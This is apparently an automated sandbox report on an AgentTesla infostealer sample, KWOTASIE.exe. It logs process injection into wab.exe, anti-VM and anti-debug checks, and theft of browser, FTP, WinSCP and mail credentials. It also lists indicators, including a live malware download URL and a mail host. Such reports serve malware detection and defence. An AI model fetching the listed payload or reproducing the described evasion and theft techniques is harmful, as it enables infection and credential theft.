Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -95234s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -95125s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -95014s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -94891s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -94766s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -94656s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -94534s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\KWOTASIE.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\Desktop\KWOTASIE.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\KWOTASIE.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\Desktop\KWOTASIE.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\KWOTASIE.exe	Code function: 0_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_0040595A
Source: C:\Users\user\Desktop\KWOTASIE.exe	Code function: 0_2_0040658F FindFirstFileW,FindClose,	0_2_0040658F
Source: C:\Users\user\Desktop\KWOTASIE.exe	Code function: 0_2_00402862 FindFirstFileW,	0_2_00402862

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99766	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99547	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99437	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99219	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99109	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98891	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98781	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98672	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98562	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98453	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98344	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98234	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98125	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98016	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97900	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97781	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97672	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97562	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97453	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97344	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97219	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97109	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96890	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96781	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96672	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96562	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96453	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96344	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96219	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96109	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95891	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95781	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95672	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95562	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95453	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95344	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95234	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95125	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95014	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 94891	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 94766	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 94656	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 94534	Jump to behavior

Source: wab.exe, 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: wab.exe, 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: wab.exe, 00000006.00000002.3277621644.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3277621644.00000000007B3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wab.exe, 00000006.00000002.3277621644.0000000000777000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(

Source: C:\Users\user\Desktop\KWOTASIE.exe

API call chain: ExitProcess graph end node

graph_0-3850

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 6_2_003370A0 CheckRemoteDebuggerPresent,

6_2_003370A0

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 6_2_0033FB24 LdrInitializeThunk,

6_2_0033FB24

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3FB0000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 33FEAC			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\KWOTASIE.exe

0_2_0040333D

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3292987188.0000000021B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 5032, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 5032, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3292987188.0000000021B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 5032, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	231 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Software Packing	1 Credentials in Registry	136 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	111 Process Injection	1 DLL Side-Loading	Security Account Manager	631 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	261 Virtualization/Sandbox Evasion	LSA Secrets	261 Virtualization/Sandbox Evasion	SSH	Keylogging	22 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
KWOTASIE.exe	3%	ReversingLabs
KWOTASIE.exe	9%	Virustotal		Browse
KWOTASIE.exe	100%	Avira	HEUR/AGEN.1331786

Source	Detection	Scanner	Link
bg.microsoft.map.fastly.net	0%	Virustotal	Browse
zakk.co.za	0%	Virustotal	Browse
ip-api.com	0%	Virustotal	Browse
mail.lumies.co.za	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
http://ip-api.com/line/?fields=hosting	0%	URL Reputation	safe
http://ip-api.com	0%	URL Reputation	safe
http://mail.lumies.co.za	0%	Virustotal		Browse
http://r11.i.lencr.org/0	0%	Avira URL Cloud	safe
http://zakk.co.za/GHAchl0.bin	100%	Avira URL Cloud	malware
http://r11.o.len	0%	Avira URL Cloud	safe
http://r11.o.lencr.org0#	0%	Avira URL Cloud	safe
http://mail.lumies.co.za	0%	Avira URL Cloud	safe
http://zakk.co.za/GHAchl0.bin	1%	Virustotal		Browse
http://r11.i.lencr.org/0	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	0%, Virustotal, Browse	unknown
zakk.co.za	102.218.215.35	true	false	0%, Virustotal, Browse	unknown
ip-api.com	208.95.112.1	true	true	0%, Virustotal, Browse	unknown
mail.lumies.co.za	102.130.125.173	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://zakk.co.za/GHAchl0.bin	false	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://ip-api.com/line/?fields=hosting	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_ErrorError	KWOTASIE.exe	false	URL Reputation: safe	unknown
http://r11.o.len	wab.exe, 00000006.00000002.3294444992.0000000023F13000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mail.lumies.co.za	wab.exe, 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://r11.o.lencr.org0#	wab.exe, 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294355001.0000000023EB4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294444992.0000000023F13000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	wab.exe, 00000006.00000002.3292987188.0000000021AF1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.c.lencr.org/0	wab.exe, 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294355001.0000000023EB4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294444992.0000000023F13000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	wab.exe, 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294355001.0000000023EB4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294444992.0000000023F13000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://r11.i.lencr.org/0	wab.exe, 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294355001.0000000023EB4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294444992.0000000023F13000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ip-api.com	wab.exe, 00000006.00000002.3292987188.0000000021AF1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	true
102.218.215.35	zakk.co.za	unknown	36926	CKL1-ASNKE	false
102.130.125.173	mail.lumies.co.za	South Africa	37153	xneeloZA	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1465894
Start date and time:	2024-07-02 08:12:45 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	KWOTASIE.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/11@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 62 Number of non-executed functions: 26
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.85.23.86, 93.184.221.240, 20.242.39.171, 52.165.164.15
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:13:37	API Interceptor	41x Sleep call for process: powershell.exe modified
02:14:33	API Interceptor	68x Sleep call for process: wab.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	ServerManager.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	MicrosoftService.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	F.exe	Get hash	malicious	AsyncRAT, Neshta, XWorm	Browse	ip-api.com/line/?fields=hosting
	x.exe	Get hash	malicious	AsyncRAT, Neshta, XWorm	Browse	ip-api.com/line/?fields=hosting
	java_update.exe	Get hash	malicious	AsyncRAT, Neshta, XWorm	Browse	ip-api.com/line/?fields=hosting
	Roblox Account Manager.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/
	x433.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	DriverUpdt.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	rinvoice.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	rQuotation.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	ServerManager.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	MicrosoftService.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	F.exe	Get hash	malicious	AsyncRAT, Neshta, XWorm	Browse	208.95.112.1
	x.exe	Get hash	malicious	AsyncRAT, Neshta, XWorm	Browse	208.95.112.1
	java_update.exe	Get hash	malicious	AsyncRAT, Neshta, XWorm	Browse	208.95.112.1
	Roblox Account Manager.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	x433.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	DriverUpdt.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	rinvoice.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	rQuotation.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
bg.microsoft.map.fastly.net	Payment Confirmation.vbs	Get hash	malicious	Remcos, GuLoader	Browse	199.232.210.172
	pDHKarOK2v.exe	Get hash	malicious	CryptOne, Vidar	Browse	199.232.214.172
	Revised Invoice 7389293.vbs	Get hash	malicious	GuLoader, Remcos	Browse	199.232.210.172
	http://differentia.ru	Get hash	malicious	Unknown	Browse	199.232.210.172
